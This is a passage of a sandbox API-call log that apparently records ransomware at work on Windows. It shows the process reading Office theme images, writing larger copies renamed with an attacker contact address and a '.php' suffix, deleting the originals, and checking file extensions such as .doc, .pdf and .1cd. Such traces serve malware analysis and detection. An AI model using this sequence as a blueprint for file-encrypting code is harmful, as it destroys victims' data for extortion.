lpString2=".PNG") returned -1 [0045.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.697] lstrlenW (lpString=".jpg") returned 4 [0045.697] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.697] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0045.697] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0045.698] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2985) returned 1 [0045.698] CloseHandle (hObject=0x1b0) returned 1 [0045.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 0x20 [0045.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0045.699] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.699] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.700] GetLastError () returned 0x0 [0045.700] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0xba9, lpOverlapped=0x0) returned 1 [0045.701] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xbb0, lpOverlapped=0x0) returned 1 [0045.703] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.703] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.703] SetEndOfFile (hFile=0x1c0) returned 1 [0045.703] CloseHandle (hObject=0x1c0) returned 1 [0045.703] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.703] SetEndOfFile (hFile=0x1b0) returned 1 [0045.704] CloseHandle (hObject=0x1b0) returned 1 [0045.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0045.704] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 1 [0045.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.704] lstrlenW (lpString=".doc") returned 4 [0045.704] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.704] lstrlenW (lpString=".docx") returned 5 [0045.705] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.705] lstrlenW (lpString=".pdf") returned 4 [0045.705] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.705] lstrlenW (lpString=".xls") returned 4 [0045.705] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.705] lstrlenW (lpString=".xlsx") returned 5 [0045.705] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.705] lstrlenW (lpString=".ppt") returned 4 [0045.705] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.705] lstrlenW (lpString=".zip") returned 4 [0045.705] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.705] lstrlenW (lpString=".rar") returned 4 [0045.705] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.705] lstrlenW (lpString=".bz2") returned 4 [0045.705] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.705] lstrlenW (lpString=".7z") returned 3 [0045.705] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.705] lstrlenW (lpString=".dbf") returned 4 [0045.705] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.705] lstrlenW (lpString=".1cd") returned 4 [0045.705] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.705] lstrlenW (lpString=".jpg") returned 4 [0045.705] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.705] lstrlenW (lpString=".doc") returned 4 [0045.705] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.705] lstrlenW (lpString=".docx") returned 5 [0045.705] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.705] lstrlenW (lpString=".pdf") returned 4 [0045.706] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.706] lstrlenW (lpString=".xls") returned 4 [0045.706] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.706] lstrlenW (lpString=".xlsx") returned 5 [0045.706] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.706] lstrlenW (lpString=".ppt") returned 4 [0045.706] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.706] lstrlenW (lpString=".zip") returned 4 [0045.706] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.706] lstrlenW (lpString=".rar") returned 4 [0045.706] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.706] lstrlenW (lpString=".bz2") returned 4 [0045.706] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.706] lstrlenW (lpString=".7z") returned 3 [0045.706] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.706] lstrlenW (lpString=".dbf") returned 4 [0045.706] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.706] lstrlenW (lpString=".1cd") returned 4 [0045.706] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.706] lstrlenW (lpString=".jpg") returned 4 [0045.706] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.706] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0045.706] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.122] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=19780) returned 1 [0046.122] CloseHandle (hObject=0x1fc) returned 1 [0046.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 0x20 [0046.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.122] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.122] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0046.123] GetLastError () returned 0x0 [0046.123] ReadFile (in: hFile=0x1fc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x4d44, lpOverlapped=0x0) returned 1 [0046.124] WriteFile (in: hFile=0x164, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x4d50, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x4d50, lpOverlapped=0x0) returned 1 [0046.125] ReadFile (in: hFile=0x1fc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.125] WriteFile (in: hFile=0x164, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.125] SetEndOfFile (hFile=0x164) returned 1 [0046.126] CloseHandle (hObject=0x164) returned 1 [0046.126] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.126] SetEndOfFile (hFile=0x1fc) returned 1 [0046.127] CloseHandle (hObject=0x1fc) returned 1 [0046.127] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.127] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 1 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.127] lstrlenW (lpString=".doc") returned 4 [0046.127] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.127] lstrlenW (lpString=".docx") returned 5 [0046.127] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.127] lstrlenW (lpString=".pdf") returned 4 [0046.127] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.127] lstrlenW (lpString=".xls") returned 4 [0046.127] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.127] lstrlenW (lpString=".xlsx") returned 5 [0046.127] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.127] lstrlenW (lpString=".ppt") returned 4 [0046.127] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.128] lstrlenW (lpString=".zip") returned 4 [0046.128] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.128] lstrlenW (lpString=".rar") returned 4 [0046.128] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.128] lstrlenW (lpString=".bz2") returned 4 [0046.128] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.128] lstrlenW (lpString=".7z") returned 3 [0046.128] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.128] lstrlenW (lpString=".dbf") returned 4 [0046.128] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.128] lstrlenW (lpString=".1cd") returned 4 [0046.128] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.128] lstrlenW (lpString=".jpg") returned 4 [0046.128] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.128] lstrlenW (lpString=".doc") returned 4 [0046.128] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.128] lstrlenW (lpString=".docx") returned 5 [0046.128] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.128] lstrlenW (lpString=".pdf") returned 4 [0046.128] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.128] lstrlenW (lpString=".xls") returned 4 [0046.128] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.128] lstrlenW (lpString=".xlsx") returned 5 [0046.128] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.128] lstrlenW (lpString=".ppt") returned 4 [0046.128] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.128] lstrlenW (lpString=".zip") returned 4 [0046.128] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.128] lstrlenW (lpString=".rar") returned 4 [0046.129] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.129] lstrlenW (lpString=".bz2") returned 4 [0046.129] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.129] lstrlenW (lpString=".7z") returned 3 [0046.129] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.129] lstrlenW (lpString=".dbf") returned 4 [0046.129] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.129] lstrlenW (lpString=".1cd") returned 4 [0046.129] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0046.129] lstrlenW (lpString=".jpg") returned 4 [0046.129] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.129] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.129] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.592] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=20627) returned 1 [0046.592] CloseHandle (hObject=0x198) returned 1 [0046.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 0x20 [0046.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.592] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.592] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.593] GetLastError () returned 0x0 [0046.593] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x5093, lpOverlapped=0x0) returned 1 [0046.599] WriteFile (in: hFile=0x1b0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x50a0, lpOverlapped=0x0) returned 1 [0046.600] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.600] WriteFile (in: hFile=0x1b0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.600] SetEndOfFile (hFile=0x1b0) returned 1 [0046.600] CloseHandle (hObject=0x1b0) returned 1 [0046.600] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.600] SetEndOfFile (hFile=0x198) returned 1 [0046.601] CloseHandle (hObject=0x198) returned 1 [0046.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.601] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 1 [0046.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.602] lstrlenW (lpString=".doc") returned 4 [0046.602] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.602] lstrlenW (lpString=".docx") returned 5 [0046.602] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.602] lstrlenW (lpString=".pdf") returned 4 [0046.602] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.602] lstrlenW (lpString=".xls") returned 4 [0046.602] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.602] lstrlenW (lpString=".xlsx") returned 5 [0046.602] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.602] lstrlenW (lpString=".ppt") returned 4 [0046.602] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.602] lstrlenW (lpString=".zip") returned 4 [0046.602] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.602] lstrlenW (lpString=".rar") returned 4 [0046.602] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.602] lstrlenW (lpString=".bz2") returned 4 [0046.602] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.602] lstrlenW (lpString=".7z") returned 3 [0046.602] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.602] lstrlenW (lpString=".dbf") returned 4 [0046.602] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.602] lstrlenW (lpString=".1cd") returned 4 [0046.602] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.602] lstrlenW (lpString=".jpg") returned 4 [0046.603] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.603] lstrlenW (lpString=".doc") returned 4 [0046.603] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.603] lstrlenW (lpString=".docx") returned 5 [0046.603] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.603] lstrlenW (lpString=".pdf") returned 4 [0046.603] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.603] lstrlenW (lpString=".xls") returned 4 [0046.603] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.603] lstrlenW (lpString=".xlsx") returned 5 [0046.603] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.603] lstrlenW (lpString=".ppt") returned 4 [0046.603] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.603] lstrlenW (lpString=".zip") returned 4 [0046.603] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.603] lstrlenW (lpString=".rar") returned 4 [0046.603] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.603] lstrlenW (lpString=".bz2") returned 4 [0046.603] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.603] lstrlenW (lpString=".7z") returned 3 [0046.603] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.603] lstrlenW (lpString=".dbf") returned 4 [0046.603] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.603] lstrlenW (lpString=".1cd") returned 4 [0046.603] lstrcmpiW 